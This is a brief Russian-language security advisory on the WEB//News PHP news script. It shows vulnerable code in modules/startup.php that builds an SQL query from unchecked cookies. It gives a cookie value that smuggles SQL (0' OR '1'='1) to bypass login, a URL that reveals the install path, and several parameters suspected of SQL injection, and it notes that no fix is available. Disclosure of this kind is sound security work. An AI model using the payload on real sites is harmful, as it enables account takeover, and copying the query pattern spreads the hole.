WEB//News мощный скрипт для ведения новостей на сайте.
Уязвимость в скрипте modules/startup.php
$_USER=$db->first(«SELECT * FROM .PRE._user LEFT JOIN .PRE._group USING (groupid)
WHERE
( userid='».$_COOKIE['wn_userid']."' AND password='".$_COOKIE['wn_userpw']."' )
LIMIT 1");
Как мы видим параметр $_COOKIE не проверяется на безопасность данных.
Для демонстрации подредактируйте значение cookies, следующим образом:
wn_userid=1; wn_userpw=0' OR '1'='1
Раскрытие установочного пути:
Примеры:
/actions/cat.add.php?name=A
Некоторые скрипты которые близки к возможной SQL-инъекции
Несколько примеров:
/include_this/news.php?cat=[SQL]
/include_this/news.php?id=[SQL]
/print.php?id=[SQL]
/include_this/news.php?stof=[SQL]
Решение: На данный момент не доступно.